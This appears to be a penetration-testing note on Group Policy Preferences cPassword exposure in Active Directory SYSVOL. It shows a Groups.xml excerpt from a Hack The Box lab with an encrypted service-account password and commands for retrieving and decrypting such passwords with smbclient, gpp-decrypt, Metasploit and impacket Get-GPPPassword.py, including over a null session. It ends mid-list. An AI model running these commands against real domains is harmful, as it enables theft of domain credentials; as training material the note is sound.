<aside> ℹ️ Group Policy Preferences is a collection of Group Policy client-side extensions that deliver preference settings to domain-joined computers running Microsoft Windows desktop and server operating systems.
</aside>
GPP is a tool that provides some advanced capabilities to administrators for configuring and managing account policy in a Windows domain network.
These policies allowed them to set local accounts, and embed credentials for various purposes that may otherwise require an embedded password in a script. So when a new Group Policy Preference (GPP) is generated, a xml file (generally Groups.xml) with the configuration data, including any passwords associated with the GPP, is created in the SYSVOL share which are folders on domain controllers accessible and readable to all authenticated domain users.
For protection Microsoft encrypts the password using AES before it is stored as “cPassword”. But the keys are available publicly on MSDN!
The Domain Group Policies are stored at:
\\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\
cat Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1"
Exist a tool in Kali Linux called gpp-decrypt:
In a different way if we have credentials we can use Metasploit with method smb_enum_gpp
If we are allowed to connect to any share as guest then we can find the cpassword value from the files on SYSVOL and pass them to the gpp-decrypt:
smbclient \\\\\\\\ip_address\\\\share
mget *
Use impacket module Get-GPPPassword.py to search and dump the password.
With a NULL session:
Get-GPPPassword.py -no-pass -dc-ip <DOMAIN.CONTROLLER.IP.ADDRESS>
With cleartext credentials: